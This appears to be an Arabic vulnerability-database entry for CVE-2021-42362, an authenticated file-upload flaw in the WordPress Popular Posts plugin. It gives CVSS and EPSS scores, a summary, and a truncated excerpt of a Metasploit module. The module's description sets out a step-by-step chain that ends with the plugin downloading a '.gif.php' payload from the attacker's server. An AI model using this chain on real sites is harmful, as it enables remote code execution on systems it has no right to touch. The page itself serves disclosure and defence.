CVE-2021-42362
WordPress Popular Posts <= 5.3.2 رفع ملفات تعسفي عبر المصادقة
- تم النشر
- 17/11/2021
- محدث
- 16/09/2024
- تخصيص CNA
- Wordfence
- الأدلة المرصودة
- 15/07/2021
CVSS الأساسي
nvd · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:Hمرتفع · الثلاثين يومًا القادمة
- المئوية
- 99.6%
- تاريخ الموديل
- 21/09/2026
EPSS هو تقدير إحصائي، وليس يقينًا أو مقياسًا للتأثير. ادمجها مع CVSS وحالة KEV والتعرض وبيئتك.
ملخص
إن إضافة WordPress المسماة WordPress Popular Posts معرضة لرفع ملفات تعسفية بسبب عدم كفاية التحقق من نوع ملفات الإدخال الموجودة في ملف ~/src/Image.php، مما يتيح للمهاجمين الحاصلين على صلاحية مستوى المساهم (contributor) فما فوق رفع ملفات خبيثة يمكن استخدامها للحصول على تنفيذ التعليمات البرمجية عن بُعد، في الإصدارات حتى 5.3.2 وما يشملها.
المصادر
4- nate158g-m-w-n-l-p-d-a-o-eاستغلال
### تتطلب هذه الوحدة Metasploit: https://metasploit.com/download# المصدر الحالي: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ يتطلب هذا الاستغلال من Metasploit أن يكون لديه اسم نطاق مؤهل بالكامل (FQDN) والقدرة على تشغيل خادم ويب للحمولة على المنفذ 80 أو 443 أو 8080. يجب أيضاً ألا يحل اسم النطاق المؤهل بالكامل إلى عنوان محجوز (192/172/127/10). يجب أن يستجيب الخادم أيضاً لطلب HEAD للحمولة، قبل تلقي طلب GET. يستغل هذا الاستغلال التحقق غير السليم من المدخلات المُوثَّق في إضافة ووردبريس Popular Posts <= 5.3.2. سلسلة الاستغلال معقدة إلى حد ما. مطلوب المصادقة ومكتبة 'gd' للPHP على الخادم. ثم يتم إعادة تكوين إضافة Popular Post للسماح بعنوان URL عشوائي لصورة المنشور في القطعة (widget). يتم إنشاء منشور، ثم تُرسل طلبات إلى المنشور لجعله أكثر شيوعاً من المنشور السابق رقم 1 بمقدار 5. بمجرد أن يصل المنشور إلى المراكز الخمسة الأولى، وبعد تحديث ذاكرة التخزين المؤقت للخادم لمدة 60 ثانية (ننتظر 90)، يتم تحميل قطعة الصفحة الرئيسية مما يؤدي إلى قيام الإضافة بتنزيل الحمولة من خادمنا. تحتوي حمولتنا على رأس 'GIF'، و امتداد مزدوج ('.gif.php') مما يسمح بتنفيذ كود PHP عشوائي. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wo
الاستخدام المسؤول
استخدم معلومات الثغرات الأمنية فقط على الأنظمة التي تمتلكها أو المرخص لها باختبارها. يرتبط Kitploit ببيانات تعريف البحث العامة ولا يخزن أكواد الاستغلال أو الحمولات الضارة.